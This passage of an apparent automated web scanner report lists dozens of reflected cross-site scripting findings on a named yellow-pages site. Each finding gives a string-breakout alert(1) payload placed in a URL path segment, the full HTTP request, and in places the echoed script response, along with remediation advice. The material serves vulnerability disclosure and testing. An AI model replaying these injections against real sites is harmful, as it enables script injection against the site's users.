User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b391"-alert(1)-"ebbad8cca05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4b391"-alert(1)-"ebbad8cca05/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96835"-alert(1)-"ff658105077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js96835"-alert(1)-"ff658105077/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eb5a"-alert(1)-"60ab2b49064 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.js1eb5a"-alert(1)-"60ab2b49064 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f6c"-alert(1)-"db0fa239d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common99f6c"-alert(1)-"db0fa239d1a/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd66c"-alert(1)-"9f68db117ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbd66c"-alert(1)-"9f68db117ce/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b82c"-alert(1)-"40296947fc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js8b82c"-alert(1)-"40296947fc2 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b0de"-alert(1)-"6b9a7c855f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1b0de"-alert(1)-"6b9a7c855f1/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3160"-alert(1)-"4829f2347d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsa3160"-alert(1)-"4829f2347d1/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c15bc"-alert(1)-"c07082ab282 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.jsc15bc"-alert(1)-"c07082ab282 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e16f"-alert(1)-"33e5c425b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9e16f"-alert(1)-"33e5c425b74/js/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed915"-alert(1)-"0cad65087d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsed915"-alert(1)-"0cad65087d6/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83d30"-alert(1)-"8c4dc2f6f41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.js83d30"-alert(1)-"8c4dc2f6f41 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da908"-alert(1)-"11ea55c2deb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonda908"-alert(1)-"11ea55c2deb/js/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
...[SNIP]... erv = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/commonda908"-alert(1)-"11ea55c2deb/js/jquery.history_remote.js?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0eb"-alert(1)-"1b21d8d7ca1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsfd0eb"-alert(1)-"1b21d8d7ca1/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
...[SNIP]... = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsfd0eb"-alert(1)-"1b21d8d7ca1/jquery.history_remote.js?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2aa9"-alert(1)-"d4fdd1017fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.history_remote.jsa2aa9"-alert(1)-"d4fdd1017fc HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsa2aa9"-alert(1)-"d4fdd1017fc?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 423a3"-alert(1)-"68dc8dd0c20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common423a3"-alert(1)-"68dc8dd0c20/js/jquery.spac.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99526"-alert(1)-"083e7c5c357 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js99526"-alert(1)-"083e7c5c357/jquery.spac.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403d2"-alert(1)-"61fb49790b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.spac.js403d2"-alert(1)-"61fb49790b4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e9bf"-alert(1)-"d6c846fad96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9e9bf"-alert(1)-"d6c846fad96/js/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c4cc"-alert(1)-"510096b9b12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js9c4cc"-alert(1)-"510096b9b12/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55146"-alert(1)-"b4dae08e2a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.js55146"-alert(1)-"b4dae08e2a6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90255"-alert(1)-"d59370ac4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common90255"-alert(1)-"d59370ac4e6/js/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86f5f"-alert(1)-"e08a57a36ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js86f5f"-alert(1)-"e08a57a36ea/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efb41"-alert(1)-"444d324d844 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/omniture_onclick.jsefb41"-alert(1)-"444d324d844 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79c04"-alert(1)-"705d250d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common79c04"-alert(1)-"705d250d4/js/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99503"-alert(1)-"e25a2d721e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js99503"-alert(1)-"e25a2d721e/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa5a"-alert(1)-"1f4b9f57f59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js3fa5a"-alert(1)-"1f4b9f57f59 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f51"-alert(1)-"a71dfc81f1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98f51"-alert(1)-"a71dfc81f1e/js/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
